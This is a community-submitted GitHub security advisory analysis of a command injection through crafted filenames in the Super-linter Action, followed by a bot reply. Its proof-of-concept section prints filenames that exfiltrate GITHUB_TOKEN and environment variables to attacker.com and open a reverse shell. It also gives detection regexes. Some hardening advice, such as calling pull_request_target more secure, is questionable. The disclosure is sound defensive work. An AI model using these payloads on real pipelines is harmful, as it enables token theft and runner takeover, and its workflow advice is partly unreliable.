[GHSA-r79c-pqj3-577x] Super-linter is vulnerable to command injection via crafted filenames in Super-linter Action

[asrar-mared]

Updates

• Description

Comments

GitHub Super-linter Command Injection Vulnerability Analysis

CVE-2026-25761 - Professional Security Assessment

---

Executive Summary

Vulnerability Identifier: CVE-2026-25761
Severity Rating: HIGH
Affected Component: Super-linter/super-linter GitHub Action
Discovery Date: Last Week
Status: PATCHED

Discovered By:
Security Researcher: Asrar Mared (The Warrior Bug Hunter)
Contact: nike49424@proton.me
GitHub: @asrar-mared

---

Vulnerability Overview

The Super-linter GitHub Action contains a critical command injection vulnerability that allows malicious actors to execute arbitrary commands through specially crafted filenames. This vulnerability represents a significant security risk to organizations utilizing Super-linter in their CI/CD pipelines.

Technical Classification

• Attack Vector: Network (via Pull Request)
• Attack Complexity: Low
• Privileges Required: None (for public repositories)
• User Interaction: Required (workflow trigger)
• Scope: Changed
• Impact Type: Command Injection / Code Execution

---

Affected Versions & Remediation

Vulnerable Versions

Component	Affected Range	Status
super-linter/super-linter	>= 6.0.0, < 8.3.1	VULNERABLE
super-linter/super-linter/slim	>= 6.0.0, < 8.3.1	VULNERABLE

Patched Versions

Component	Secure Version	Release Date
super-linter/super-linter	8.3.1	Last Week
super-linter/super-linter/slim	8.3.1	Last Week

---

Technical Deep Dive

Attack Mechanism

The vulnerability exploits insufficient input validation in Super-linter's file discovery mechanism. The workflow processes filenames without proper sanitization, allowing shell command substitution syntax to be executed.

Exploitation Flow

1. Attacker submits Pull Request
   ↓
2. PR contains file with malicious name: $(curl http://attacker.com?token=$GITHUB_TOKEN)
   ↓
3. Super-linter workflow triggers on pull_request event
   ↓
4. File discovery script processes filename
   ↓
5. Shell interprets $(...) as command substitution
   ↓
6. Malicious command executes in workflow context
   ↓
7. Attacker gains access to GITHUB_TOKEN and workflow secrets

Proof of Concept (Educational Purpose)

Malicious Filename Example:

# Filename that exfiltrates GitHub token
"$(curl -X POST https://attacker.com/collect -d token=$GITHUB_TOKEN).txt"

# Filename that executes reverse shell
"$(bash -i >& /dev/tcp/attacker.com/4444 0>&1).md"

# Filename that enumerates environment
"$(env | curl -X POST https://attacker.com/dump --data-binary @-).py"

Root Cause Analysis

The vulnerability stems from the file scanning logic within Super-linter that processes repository files. The scripts use unquoted variable expansion and command substitution patterns without proper escaping:

Vulnerable Code Pattern (Conceptual):

# Vulnerable approach
FILES=$(find . -name "$PATTERN")
for file in $FILES; do
    # Command injection occurs here
    process_file $file
done

Secure Alternative:

# Secure approach
find . -name "$PATTERN" -print0 | while IFS= read -r -d '' file; do
    # Properly quoted and escaped
    process_file "$file"
done

---

Impact Assessment

Security Implications

1. Arbitrary Code Execution

• Impact Level: CRITICAL
• Attackers can execute any command within the runner environment
• Full access to workflow execution context
• Potential for lateral movement within CI/CD infrastructure

2. Credential Exposure

• Impact Level: HIGH
• Access to GITHUB_TOKEN with repository permissions
• Exposure of environment variables and secrets
• Potential compromise of deployment credentials

3. Supply Chain Attack Vector

• Impact Level: HIGH
• Compromised workflows can inject malicious code
• Potential for persistent backdoors in CI/CD pipeline
• Risk of downstream software supply chain compromise

Exploitation Prerequisites

For successful exploitation, the following conditions must be met:

Requirement	Description	Likelihood
Workflow Trigger	Super-linter configured for pull_request events	HIGH
Repository Access	Ability to create Pull Requests	MEDIUM-HIGH
Approval Bypass	Workflow runs without admin approval	VARIABLE
Token Permissions	GITHUB_TOKEN with write/delete access	MEDIUM

Attack Scenarios

Scenario 1: Public Repository Attack

Attacker: External contributor
Target: Open-source project using Super-linter
Attack Vector: Malicious PR with crafted filename
Impact: Token exfiltration, code injection

Scenario 2: Fork-Based Attack

Attacker: Repository fork owner
Target: Parent repository with Super-linter
Attack Vector: PR from forked repo
Impact: Limited (read-only token in fork context)

Scenario 3: Internal Threat

Attacker: Repository collaborator
Target: Private repository
Attack Vector: Direct PR with malicious file
Impact: Full compromise potential

---

Detection & Indicators of Compromise

Detection Methods

1. Workflow Log Analysis

Look for suspicious patterns in GitHub Actions logs:

- Unusual network connections during Super-linter execution
- Unexpected command executions in file processing steps
- Error messages indicating shell interpretation of filenames
- Outbound connections to external domains

2. File Naming Patterns

Monitor for suspicious filename patterns in Pull Requests:

# Regex patterns for detection
.*\$\(.*\).*          # Command substitution
.*`.*`.*              # Backtick substitution
.*;\s*.*              # Command chaining
.*\|\s*.*             # Pipe operations
.*&&\s*.*             # Logical AND chaining

3. Behavioral Indicators

- Pull Requests with unusual file naming conventions
- Workflow failures in file discovery steps
- Unexpected outbound network traffic during linting
- Anomalous environment variable access patterns

---

Mitigation Strategies

Immediate Actions (Emergency Response)

1. Update Super-linter (CRITICAL - Priority 1)

# Update workflow configuration
- name: Lint Code Base
  uses: super-linter/super-linter@v8.3.1  # Updated version
  env:
    GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

2. Implement Workflow Restrictions (HIGH - Priority 2)

# Require approval for external contributors
on:
  pull_request_target:  # More secure for external PRs
    
permissions:
  contents: read        # Minimal necessary permissions
  pull-requests: read

3. Token Permission Hardening (HIGH - Priority 3)

permissions:
  contents: read
  # Deny write access unless explicitly needed
  actions: none
  checks: none
  deployments: none

Long-Term Security Improvements

1. Input Validation Layer

- name: Validate PR Files
  run: |
    # Reject PRs with suspicious filenames
    if git diff --name-only HEAD^ | grep -E '\$\(|\`|;|\||&&'; then
      echo "Suspicious filename detected"
      exit 1
    fi

2. Sandboxed Execution Environment

- name: Run Super-linter in Container
  uses: docker://ghcr.io/super-linter/super-linter:v8.3.1
  with:
    security-opt: no-new-privileges
    read-only: true

3. Monitoring & Alerting

- name: Security Monitoring
  if: failure()
  uses: actions/github-script@v7
  with:
    script: |
      // Alert security team on suspicious activity
      await github.rest.issues.create({
        title: 'Potential Super-linter Exploit Attempt',
        body: 'Suspicious workflow failure detected'
      });

---

Recommendations

For Repository Administrators

IMMEDIATE (0-24 hours):

1. ✅ Update all Super-linter workflows to version 8.3.1
2. ✅ Audit recent Pull Requests for suspicious filenames
3. ✅ Review workflow logs for exploitation indicators
4. ✅ Rotate potentially compromised tokens

SHORT-TERM (1-7 days):

1. 🔒 Implement workflow approval requirements for external contributors
2. 🔒 Apply principle of least privilege to GITHUB_TOKEN permissions
3. 🔒 Enable branch protection rules
4. 🔒 Configure security scanning and secret detection

LONG-TERM (Ongoing):

1. 📊 Establish continuous monitoring for workflow anomalies
2. 📊 Conduct regular security audits of CI/CD configurations
3. 📊 Train development team on secure workflow practices
4. 📊 Implement defense-in-depth strategies

For Security Teams

1. Threat Intelligence:

   • Monitor for active exploitation attempts
   • Track related CVEs and attack patterns
   • Share IOCs with security community

2. Incident Response:

   • Develop playbooks for CI/CD compromises
   • Practice incident response scenarios
   • Establish communication protocols

3. Security Architecture:

   • Review all GitHub Actions for similar vulnerabilities
   • Implement workflow security baselines
   • Deploy automated security testing

---

Additional Context & References

Related Security Advisories

• GHSA-r79c-pqj3-577x: GitHub Security Advisory
• NVD CVE-2026-25761: National Vulnerability Database Entry

Official Resources

• Super-linter v8.3.1 Release Notes
• GitHub Actions Security Best Practices
• GitHub Enterprise Security Hardening Guide

Workflow Security Considerations

High-Risk Workflow Triggers:

• pull_request_target: Has write access to base repository
• workflow_call: Inherits caller's permissions
• pull_request: Can be exploited without this CVE

Recommended Configuration:

# Secure workflow template
name: Secure Linting
on:
  pull_request:
    types: [opened, synchronize, reopened]

permissions:
  contents: read
  pull-requests: read

jobs:
  lint:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: super-linter/super-linter@v8.3.1
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

---

Conclusion

CVE-2026-25761 represents a significant security vulnerability in a widely-used GitHub Action. The command injection flaw demonstrates the critical importance of input validation in CI/CD security. Organizations must prioritize updating to Super-linter v8.3.1 and implementing comprehensive workflow security controls.

The discovery and responsible disclosure of this vulnerability highlights the essential role of security researchers in protecting the software supply chain. Continuous vigilance and proactive security measures remain paramount in maintaining secure development pipelines.

---

Report Compiled By:
Asrar Mared - The Warrior Bug Hunter
Security Researcher & Vulnerability Analyst
Contact: nike49424@proton.me
GitHub: @asrar-mared

Report Date: February 2026
Classification: Public
Version: 1.0

---

This report is provided for educational and defensive security purposes. Unauthorized exploitation of vulnerabilities is illegal and unethical.

[github]

Hi there @ferrarimarco! A community member has suggested an improvement to your security advisory. If approved, this change will affect the global advisory listed at github.com/advisories. It will not affect the version listed in your project repository.

This change will be reviewed by our Security Curation Team. If you have thoughts or feedback, please share them in a comment here! If this PR has already been closed, you can start a new community contribution for this advisory

[asrar-mared]

A file containing the complete analysis and solution to the vulnerability has been added to the Zayed Shield repository. You can refer to it directly if you need technical details or remediation steps. My goal is to share knowledge and support the security community. I wish I could offer more, but these are my current capabilities. Nevertheless, I am working hard to demonstrate a level of professionalism that we all deserve.

The full analysis and solution to the vulnerability have been added to the Zayed Shield repository.